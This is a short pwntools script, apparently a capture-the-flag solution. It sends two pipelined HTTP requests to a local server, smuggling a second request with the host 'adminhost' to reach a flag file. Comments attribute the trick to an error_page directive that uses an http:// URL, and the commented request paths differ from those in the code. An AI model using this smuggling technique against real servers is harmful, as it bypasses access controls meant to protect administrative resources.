import pwn

pwn.context.log_level = 'error'

remote = pwn.remote('localhost', 80)

remote.sendline('GET / HTTP/1.1')
remote.sendline('Host: localhost')
remote.sendline('')
remote.sendline('GET / HTTP/1.1')
remote.sendline('Host: adminhost')
remote.sendline('')

remote.interactive()

# the request looks like this:
# GET /a HTTP/1.1
# Host: localhost
#
# GET /flag.txt HTTP/1.1
# Host: adminhost

# where the second one is the one being smuggled
# this only works because server is using http://url in error_page directive